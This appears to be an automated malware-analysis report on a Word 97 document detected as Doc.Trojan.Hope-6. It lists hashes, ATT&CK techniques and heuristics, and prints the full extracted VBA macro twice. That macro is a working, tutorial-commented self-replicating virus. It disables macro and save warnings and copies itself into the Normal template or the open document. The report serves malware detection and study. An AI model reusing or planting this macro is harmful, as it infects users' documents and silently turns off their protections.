Office (OLE) malware analysis — malicious · 02637e9b20bbe464

MALICIOUS

Office (OLE)

30.5 KB Created: 2000-01-21 05:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: eae7eaac8e435434a8d8a318287406bc SHA-1: f407e6140d6b1cc303bb764af71f8a19c82a8665 SHA-256: 02637e9b20bbe464d808275ab77ed0abb43efb07ef9334d29e84a2fe5fbfb4a4

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to infect other documents. The macro disables user prompts and conversion warnings to ensure its code is copied to the Normal.dot template or the active document. The ClamAV detection name 'Doc.Trojan.Hope-6' further confirms its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Hope-6 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Hope-6
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2035 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2035 bytes
SHA-256: `e42d52b39e7638c94756e7c2dfa029544d8eb051f8fd135e9b3b98c5cbe902ed`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True '// The Following Is A Simple Class '// Virus. This Was Written To Help '// Explain The Basics Of A Word 97 '// Class Module Virus. This Does '// Not Go Into The Theory Of Class '// Infection But Instead Comments '// On The Technique Used In This '// Example. Private Sub Document_Open() '// This Hooks The Document Open And Will '// Run The Code Between The Sub/End Sub Application.EnableCancelKey = wdCancelDisabled '// This Prevents The User From Stoping '// Macro Execution Options.ConfirmConversions = Yes '// This Disables Document Conversion '// Warning... Yes = 0 = False Options.SaveNormalPrompt = Yes '// This Disables The Save Changes '// Warning For The NormalTemplate '// Again Yes = 0 = False Options.VirusProtection = Yes '// Disables Macro Warning '// Yes = 0 = False If ThisDocument = ActiveDocument Then Set Target = NormalTemplate Else Set Target = ActiveDocument '// This Sets The Target To Infect I = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) '// This Creates The String 'I' To Equal '// The Viral Code Set Destination = Target.VBProject.VBComponents.Item(1).CodeModule '// This Sets The 'Destination' To Which '// The Virus Will Use To Clear And Infect Destination.DeleteLines 1, Destination.CountOfLines '// This Clears The Target Destination '// So That The Virus Will Have A Clean '// Module To Infect Destination.AddFromString I '// This Adds The Virus Code To The '// Destination If Target = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName '// If The Target Is The ActiveDocument '// It Will Save The Changes The Virus '// Made End Sub '// This Ends The Document_Open Sub

SHA-256: e42d52b39e7638c94756e7c2dfa029544d8eb051f8fd135e9b3b98c5cbe902ed

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'// The Following Is A Simple Class
'// Virus. This Was Written To Help
'// Explain The Basics Of A Word 97
'// Class Module Virus. This Does
'// Not Go Into The Theory Of Class
'// Infection But Instead Comments
'// On The Technique Used In This
'// Example.

Private Sub Document_Open()
'// This Hooks The Document Open And Will
'// Run The Code Between The Sub/End Sub

Application.EnableCancelKey = wdCancelDisabled
'// This Prevents The User From Stoping
'// Macro Execution

Options.ConfirmConversions = Yes
'// This Disables Document Conversion
'// Warning... Yes = 0 = False

Options.SaveNormalPrompt = Yes
'// This Disables The Save Changes
'// Warning For The NormalTemplate
'// Again Yes = 0 = False

Options.VirusProtection = Yes
'// Disables Macro Warning
'// Yes = 0 = False

If ThisDocument = ActiveDocument Then Set Target = NormalTemplate Else Set Target = ActiveDocument
'// This Sets The Target To Infect

I = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
'// This Creates The String 'I' To Equal
'// The Viral Code

Set Destination = Target.VBProject.VBComponents.Item(1).CodeModule
'// This Sets The 'Destination' To Which
'// The Virus Will Use To Clear And Infect

Destination.DeleteLines 1, Destination.CountOfLines
'// This Clears The Target Destination
'// So That The Virus Will Have A Clean
'// Module To Infect

Destination.AddFromString I
'// This Adds The Virus Code To The
'// Destination

If Target = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'// If The Target Is The ActiveDocument
'// It Will Save The Changes The Virus
'// Made

End Sub
'// This Ends The Document_Open Sub

Open this report in the interactive analyzer, or submit your own file for analysis.